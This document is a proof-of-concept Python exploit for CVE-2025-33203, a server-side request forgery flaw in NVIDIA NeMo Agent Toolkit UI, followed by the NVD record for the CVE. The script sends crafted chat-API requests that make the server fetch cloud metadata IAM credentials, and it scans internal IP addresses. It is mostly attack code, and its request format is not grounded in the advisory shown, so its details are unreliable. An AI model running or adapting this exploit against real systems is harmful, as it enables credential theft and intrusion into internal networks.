CVE-2025-33203

import requests import json # CVE-2025-33203 PoC - NVIDIA NeMo Agent Toolkit SSRF # Target: NVIDIA NeMo Agent Toolkit UI for Web TARGET_URL = "http://target-server:8080/api/chat" ATTACKER_CONTROLLED_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" def exploit_ssrf(target_url, malicious_url): """ Exploit SSRF vulnerability in NVIDIA NeMo Agent Toolkit chat API This PoC demonstrates how an attacker can trigger SSRF to access cloud metadata """ headers = { "Content-Type": "application/json", "Authorization": "Bearer <valid_token>" } # Malicious payload that triggers SSRF payload = { "message": "Please fetch the data from internal service", "action": "fetch_url", "url": malicious_url, "options": { "timeout": 30, "follow_redirects": True } } try: response = requests.post(target_url, headers=headers, json=payload, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") return response.json() except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None def scan_internal_network(target_url): """ Scan internal network via SSRF """ internal_ips = [ "10.0.0.1", "10.0.0.2", "192.168.1.1", "127.0.0.1" ] results = [] for ip in internal_ips: payload = { "message": "check status", "action": "fetch_url", "url": f"http://{ip}/", "options": {"timeout": 5} } try: response = requests.post(target_url, json=payload, timeout=5) results.append({ "ip": ip, "accessible": response.status_code != 500, "status": response.status_code }) except: results.append({"ip": ip, "accessible": False}) return results if __name__ == "__main__": print("[*] CVE-2025-33203 SSRF Exploitation PoC") print("[*] Target: NVIDIA NeMo Agent Toolkit UI") # Exploit to fetch cloud metadata print("\n[+] Attempting to fetch cloud metadata...") result = exploit_ssrf(TARGET_URL, ATTACKER_CONTROLLED_URL) # Scan internal network print("\n[+] Scanning internal network...") internal_results = scan_internal_network(TARGET_URL) for r in internal_results: print(f" {r['ip']}: {'Accessible' if r.get('accessible') else 'Not Accessible'}")

{"cve": {"id": "CVE-2025-33203", "sourceIdentifier": "[email protected]", "published": "2025-11-25T18:15:52.200", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA NeMo Agent Toolkit UI for Web contains a vulnerability in the chat API endpoint where an attacker may cause a Server-Side Request Forgery. A successful exploit of this vulnerability may lead to information disclosure and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33203", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5726", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33203", "source": "[email protected]"}]}}